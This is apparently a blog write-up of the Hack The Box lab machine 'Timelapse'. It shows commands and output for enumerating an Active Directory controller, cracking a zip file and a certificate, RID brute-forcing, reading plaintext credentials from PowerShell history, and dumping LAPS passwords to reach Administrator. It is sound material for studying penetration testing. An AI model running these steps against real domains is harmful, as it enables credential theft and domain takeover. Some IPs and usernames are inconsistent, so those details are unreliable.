Timelapse - [HTB]

Cover Image for Timelapse - [HTB]
Marmeus
Marmeus

Table of Contents

    Introduction

    Timelapse is an easy Windows machine where the attacker will have to use some certificates and some rid enumeration to access the machine as the user "leggacy". Then, looking at the PowerShell history, it will find some credentials for a user who can read LAPS passwords. Finally, using crackmapexec the attacker can obtain the DC password, obtaining the root flag.

    Enumeration

    As always, let's start finding all opened ports in the machine with Nmap.

    kali@kali:~/Documents/HTB/Timelapse$ sudo nmap -v -sS -p- -n -T4 -oN AllPorts.txt 10.10.11.52
    Nmap scan report for 10.10.11.52
    Host is up (0.18s latency).
    Not shown: 65517 filtered tcp ports (no-response)
    PORT      STATE SERVICE
    53/tcp    open  domain
    88/tcp    open  kerberos-sec
    135/tcp   open  msrpc
    139/tcp   open  netbios-ssn
    389/tcp   open  ldap
    445/tcp   open  microsoft-ds
    464/tcp   open  kpasswd5
    593/tcp   open  http-rpc-epmap
    636/tcp   open  ldapssl
    3268/tcp  open  globalcatLDAP
    3269/tcp  open  globalcatLDAPssl
    5986/tcp  open  wsmans
    9389/tcp  open  adws
    49667/tcp open  unknown
    49673/tcp open  unknown
    49674/tcp open  unknown
    49696/tcp open  unknown
    54552/tcp open  unknown
    
    Read data files from: /usr/bin/../share/nmap

    Then, we continue with a deeper scan of every opened port, getting more information about each service.

    kali@kali:~/Documents/HTB/Timelapse$ sudo nmap -sC -sV -n -T4 -oN PortsDepth.txt -p 53,88,135,139,389,445,464,593,636,3268,3269,5986,9389,49667,49673,49674,49696,54552 10.10.11.52
    Nmap scan report for 10.10.11.52
    Host is up (0.17s latency).
    
    PORT      STATE SERVICE           VERSION
    53/tcp    open  domain            Simple DNS Plus
    88/tcp    open  kerberos-sec      Microsoft Windows Kerberos (server time: 2022-03-28 04:14:31Z)
    135/tcp   open  msrpc             Microsoft Windows RPC
    139/tcp   open  netbios-ssn       Microsoft Windows netbios-ssn
    389/tcp   open  ldap              Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
    445/tcp   open  microsoft-ds?
    464/tcp   open  kpasswd5?
    593/tcp   open  ncacn_http        Microsoft Windows RPC over HTTP 1.0
    636/tcp   open  ldapssl?
    3268/tcp  open  ldap              Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
    3269/tcp  open  globalcatLDAPssl?
    5986/tcp  open  ssl/http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
    |_http-server-header: Microsoft-HTTPAPI/2.0
    | tls-alpn: 
    |_  http/1.1
    |_ssl-date: 2022-03-28T04:16:06+00:00; +7h59m59s from scanner time.
    |_http-title: Not Found
    | ssl-cert: Subject: commonName=dc01.timelapse.htb
    | Not valid before: 2021-10-25T14:05:29
    |_Not valid after:  2022-10-25T14:25:29
    9389/tcp  open  mc-nmf            .NET Message Framing
    49667/tcp open  msrpc             Microsoft Windows RPC
    49673/tcp open  ncacn_http        Microsoft Windows RPC over HTTP 1.0
    49674/tcp open  msrpc             Microsoft Windows RPC
    49696/tcp open  msrpc             Microsoft Windows RPC
    54552/tcp open  msrpc             Microsoft Windows RPC
    Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
    
    Host script results:
    | smb2-time: 
    |   date: 2022-03-28T04:15:28
    |_  start_date: N/A
    |_clock-skew: mean: 7h59m58s, deviation: 0s, median: 7h59m58s
    | smb2-security-mode: 
    |   3.1.1: 
    |_    Message signing enabled and required
    
    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    # Nmap done at Sun Mar 27 16:16:10 2022 -- 1 IP address (1 host up) scanned in 106.26 seconds

    Thanks to Nmap, it was possible to obtain the domain of the machine dc01.timelapse.htb.

    Looking at the SMB service without credentials, there is a share named Shares.

    kali@kali:~/Documents/HTB/Timelapse$ smbclient -N -L //dc01.timelapse.htb/
    
            Sharename       Type      Comment
            ---------       ----      -------
            ADMIN$          Disk      Remote Admin
            C$              Disk      Default share
            IPC$            IPC       Remote IPC
            NETLOGON        Disk      Logon server share 
            Shares          Disk      
            SYSVOL          Disk      Logon server share 
    Reconnecting with SMB1 for workgroup listing.
    do_connect: Connection to dc01.timelapse.htb failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
    Unable to connect with SMB1 -- no workgroup available
    

    Enumerating the share, there is a winrm_backup.zip and LAPS' documentation.

    kali@kali:~/Documents/HTB/Timelapse$ smbclient -N //dc01.timelapse.htb/Shares
    Try "help" to get a list of possible commands.
    smb: \> dir
      .                                   D        0  Mon Oct 25 11:39:15 2021
      ..                                  D        0  Mon Oct 25 11:39:15 2021
      Dev                                 D        0  Mon Oct 25 15:40:06 2021
      HelpDesk                            D        0  Mon Oct 25 11:48:42 2021
    
                    6367231 blocks of size 4096. 1192342 blocks available
                    
    smb: \> cd Dev\
    smb: \Dev\> dir
      .                                   D        0  Mon Oct 25 15:40:06 2021
      ..                                  D        0  Mon Oct 25 15:40:06 2021
      winrm_backup.zip                    A     2611  Mon Oct 25 11:46:42 2021
    
                    6367231 blocks of size 4096. 1192342 blocks available
    smb: \Dev\> get winrm_backup.zip
    getting file \Dev\winrm_backup.zip of size 2611 as winrm_backup.zip (3.6 KiloBytes/sec) (average 3.6 KiloBytes/sec)
    smb: \Dev\> cd ..\HelpDesk\
    smb: \HelpDesk\> dir
      .                                   D        0  Mon Oct 25 11:48:42 2021
      ..                                  D        0  Mon Oct 25 11:48:42 2021
      LAPS.x64.msi                        A  1118208  Mon Oct 25 10:57:50 2021
      LAPS_Datasheet.docx                 A   104422  Mon Oct 25 10:57:46 2021
      LAPS_OperationsGuide.docx           A   641378  Mon Oct 25 10:57:40 2021
      LAPS_TechnicalSpecification.docx      A    72683  Mon Oct 25 10:57:44 2021

    The backup file is password protected. Nonetheless, it can be cracked pretty easily with john.

    kali@kali:~/Documents/HTB/Timelapse$ unzip winrm_backup.zip 
    Archive:  winrm_backup.zip
    [winrm_backup.zip] legacyy_dev_auth.pfx password: 
    
    kali@kali:~/Documents/HTB/Timelapse$ zip2john winrm_backup.zip > zip_hash.txt
    kali@kali:~/Documents/HTB/Timelapse$ john -w=/usr/share/wordlists/rockyou.txt zip_hash.txt 
    [...]
    supremelegacy    (winrm_backup.zip/legacyy_dev_auth.pfx)

    Inside the zip file, there is a windows certificate.

    kali@kali:~/Documents/HTB/Timelapse$ unzip winrm_backup.zip 
    Archive:  winrm_backup.zip
    [winrm_backup.zip] legacyy_dev_auth.pfx password: supremelegacy
      inflating: legacyy_dev_auth.pfx 
    

    This certificate is also password protected. However, once again, it can be cracked with john.

    kali@kali:~/Documents/HTB/Timelapse$ sudo apt install john-data -y
    kali@kali:~/Documents/HTB/Timelapse$ pfx2john legacyy_dev_auth.pfx > legacy_dev_hasht.txt 
    kali@kali:~/Documents/HTB/Timelapse$ john -w=/usr/share/wordlists/rockyou.txt legacy_dev_hasht.txt 
    [...]
    thuglegacy       (legacyy_dev_auth.pfx)     

    Moreover, doing some rid-brute force, it can be discovered that "legaccy" is a legit user on the AD domain.

    kali@kali:~/Documents/HTB/Timelapse$ crackmapexec smb  dc01.timelapse.htb  -d timelapse.htb  -u 'guest' -p '' --rid-brute | grep -i user
    SMB         dc01.timelapse.htb 445    DC01             500: TIMELAPSE\Administrator (SidTypeUser)
    SMB         dc01.timelapse.htb 445    DC01             501: TIMELAPSE\Guest (SidTypeUser)
    SMB         dc01.timelapse.htb 445    DC01             502: TIMELAPSE\krbtgt (SidTypeUser)
    SMB         dc01.timelapse.htb 445    DC01             513: TIMELAPSE\Domain Users (SidTypeGroup)
    SMB         dc01.timelapse.htb 445    DC01             525: TIMELAPSE\Protected Users (SidTypeGroup)
    SMB         dc01.timelapse.htb 445    DC01             1000: TIMELAPSE\DC01$ (SidTypeUser)
    SMB         dc01.timelapse.htb 445    DC01             1601: TIMELAPSE\thecybergeek (SidTypeUser)
    SMB         dc01.timelapse.htb 445    DC01             1602: TIMELAPSE\payl0ad (SidTypeUser)
    SMB         dc01.timelapse.htb 445    DC01             1603: TIMELAPSE\legacyy (SidTypeUser)
    SMB         dc01.timelapse.htb 445    DC01             1604: TIMELAPSE\sinfulz (SidTypeUser)
    SMB         dc01.timelapse.htb 445    DC01             1605: TIMELAPSE\babywyrm (SidTypeUser)
    SMB         dc01.timelapse.htb 445    DC01             1606: TIMELAPSE\DB01$ (SidTypeUser)
    SMB         dc01.timelapse.htb 445    DC01             1607: TIMELAPSE\WEB01$ (SidTypeUser)
    SMB         dc01.timelapse.htb 445    DC01             1608: TIMELAPSE\DEV01$ (SidTypeUser)
    SMB         dc01.timelapse.htb 445    DC01             3103: TIMELAPSE\svc_deploy (SidTypeUser)

    Exploitation

    Because the only service that accepts ciphered communication is winrm with evil-winrm, we need to convert the windows certificate into a private key and certificate in PEM format. After that, you will obtain the user flag.

    kali@kali:~/Documents/HTB/Timelapse$ openssl pkcs12 -in legacyy_dev_auth.pfx -out private.key -nocerts -nodes
    Enter Import Password:
    kali@kali:~/Documents/HTB/Timelapse$ openssl pkcs12 -in legacyy_dev_auth.pfx -out certificate.pem -nokeys -clcerts
    kali@kali:~/Documents/HTB/Timelapse$ evil-winrm -S -c certificate.pem -k private.key -i dc01.timelapse.htb -u legacyy
    *Evil-WinRM* PS C:\Users\legacyy\Documents> type ..\Desktop\user.txt
    [CENSORED]

    Privilege Escalation

    Looking at the legacyy's PowerShell console history, we can obtain some credentials used to access the machine through winrm as the user "svc_deploy".

    *Evil-WinRM* PS C:\Users\legacyy\Documents> type C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt 
    whoami
    ipconfig /all
    netstat -ano |select-string LIST
    $so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
    $p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
    $c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
    invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami}
    get-aduser -filter * -properties *
    exit

    Enumerating this user, you can see that it is a member of the "LAPS_Readers" group.

    *Evil-WinRM* PS C:\Users\legacyy\Documents> net user svc_deploy
    User name                    svc_deploy
    Full Name                    svc_deploy
    [...]
    Local Group Memberships      *Remote Management Use
    Global Group memberships     *LAPS_Readers         *Domain Users
    The command completed successfully.

    Hence, thanks to crackmapexec, you can retrieve the LAPS passwords, obtaining the DC01's password.

    Note: This password change for every machine reset.

    kali@kali:~/Documents/HTB/Timelapse$ crackmapexec ldap 10.10.11.152 -u 'svc_deploy' -p 'E3R$Q62^12p7PLlC%KWaxuaV' –kdcHost 10.10.11.152 -M laps 
    SMB         10.10.11.152    445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:timelapse.htb) (signing:True) (SMBv1:False)
    LDAP        10.10.11.152    389    DC01             [+] timelapse.htb\svc_deploy:E3R$Q62^12p7PLlC%KWaxuaV 
    LAPS        10.10.11.152    389    DC01             [*] Getting LAPS Passwords
    LAPS        10.10.11.152    389    DC01             Computer: DC01$                Password: 7-&#sh5C%]y@LGtq{ET8Yi{1

    Finally, we can obtain the root flag accessing the machine as Administration.

    kali@kali:~/Documents/HTB/Timelapse$ evil-winrm -i 10.10.11.152 -S -u Administrator -p '7-&#sh5C%]y@LGtq{ET8Yi{1'
    *Evil-WinRM* PS C:\Users\Administrator\Documents> type "C:/Users/TRX/Desktop/root.txt"
    [CENSORED_FLAG]